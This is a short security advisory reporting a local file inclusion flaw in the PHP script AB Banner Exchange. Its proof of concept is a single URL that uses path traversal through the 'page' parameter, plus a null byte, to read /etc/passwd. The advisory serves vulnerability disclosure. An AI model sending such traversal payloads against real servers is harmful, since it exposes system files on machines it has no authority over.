AB Banner Exchange Local File Inclusion

2012.08.25
Credit: Yakir Wizman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

----------------------------------------------------------- AB Banner Exchange (index.php page) Local file inclusion Bug discovered by Yakir Wizman Date 24/08/2012 Vendor Homepage - http://www.abscripts.com/ab-banner-exchange/ Demo - http://www.scripts-demo.com/ab-banner-exchange/ ISRAEL ----------------------------------------------------------- Author will be not responsible for any damage. ----------------------------------------------------------- About the Application ----------------------------------------------------------- AB Banner Exchange is an advanced PHP script for running your own banner exchange system. Proof Of Conecpt ----------------------------------------------------------- Local file inclusion (Severity is high) Vulnerable URL : http://server/ab-banner-exchange/index.php?page=../../../../../../../../../../etc/passwd%00

References:

http://www.scripts-demo.com/ab-banner-exchange/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top